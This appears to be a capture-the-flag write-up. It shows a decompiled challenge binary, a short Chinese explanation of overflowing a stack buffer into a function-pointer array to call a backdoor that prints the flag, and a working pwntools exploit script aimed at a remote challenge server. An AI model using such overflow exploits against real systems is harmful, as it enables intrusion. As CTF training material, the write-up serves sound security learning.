int __cdecl main()
{
size_t v0; // ebx
char v2[32]; // [esp+10h] [ebp-74h] BYREF
_DWORD v3[10]; // [esp+30h] [ebp-54h]
char s[32]; // [esp+58h] [ebp-2Ch] BYREF
int v5; // [esp+78h] [ebp-Ch]
size_t i; // [esp+7Ch] [ebp-8h]
v5 = 1;
v3[0] = sub_8048604;
v3[1] = sub_8048618;
v3[2] = sub_804862C;
v3[3] = sub_8048640;
v3[4] = sub_8048654;
v3[5] = sub_8048668;
v3[6] = sub_804867C;
v3[7] = sub_8048690;
v3[8] = sub_80486A4;
v3[9] = sub_80486B8;
puts("What is your name?");
printf("> ");
fflush(stdout);
fgets(s, 32, stdin);
sub_80485DD(s);
fflush(stdout);
printf("I should give you a pointer perhaps. Here: %x\n\n", sub_8048654);
fflush(stdout);
puts("Enter the string to be validate");
printf("> ");
fflush(stdout);
__isoc99_scanf("%s", v2);
for ( i = 0; ; ++i )
{
v0 = i;
if ( v0 >= strlen(v2) )
break;
switch ( v5 )
{
case 1:
if ( sub_8048702(v2[i]) )
v5 = 2;
break;
case 2:
if ( v2[i] == 64 )
v5 = 3;
break;
case 3:
if ( sub_804874C(v2[i]) )
v5 = 4;
break;
case 4:
if ( v2[i] == '.' )
v5 = 5;
break;
case 5:
if ( sub_8048784(v2[i]) )
v5 = 6;
break;
case 6:
if ( sub_8048784(v2[i]) )
v5 = 7;
break;
case 7:
if ( sub_8048784(v2[i]) )
v5 = 8;
break;
case 8:
if ( sub_8048784(v2[i]) )
v5 = 9;
break;
case 9:
v5 = 10;
break;
default:
continue;
}
}
(v3[--v5])();
return fflush(stdout);
}
找到后门函数sub_80486CC()
输入v2的时候可以溢出到v3, 覆盖函数地址到后门函数, 在(v3[--v5])();
处可以调用后门函数实现cat flag. 覆盖v3[0] = sub_80486CC, 控制v5 == 1, 输入的字符串绕开switch维持v5为1, 即可调用后门.
from pwn import *
context.log_level = 'debug'
PORT = 51755
URL = "111.200.241.244"
sel = 1
io = process('./d033ab68b3e64913a1b6b1029ef3dc29') if sel == 0 else remote(URL, PORT)
off_addr = 0x20
vulfunc_addr = 0x080486CC
payload = b'F' * off_addr + p32(vulfunc_addr)
io.recvuntil('> ')
io.sendline('f')
io.recvuntil('> ')
io.sendline(payload)
io.interactive()